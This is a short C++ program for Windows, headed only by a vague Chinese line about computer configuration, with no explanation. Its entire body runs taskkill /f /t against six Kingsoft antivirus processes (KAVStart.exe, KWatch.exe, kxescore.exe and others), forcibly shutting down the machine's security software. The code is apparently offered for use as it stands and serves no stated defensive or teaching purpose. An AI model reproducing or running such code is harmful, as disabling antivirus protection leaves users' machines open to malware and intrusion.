要看电脑配置

#include<windows.h>
#include<bits/stdc++.h>
using namespace std;
int main(){
	system("taskkill /f /t /im KAVStart.exe");
	system("taskkill /f /t /im KWatch.exe");
	system("taskkill /f /t /im KMailMon.exe");
	system("taskkill /f /t /im KMService.exe");
	system("taskkill /f /t /im kxescore.exe");
	system("taskkill /f /t /im kxetray.exe");
	return 0;
}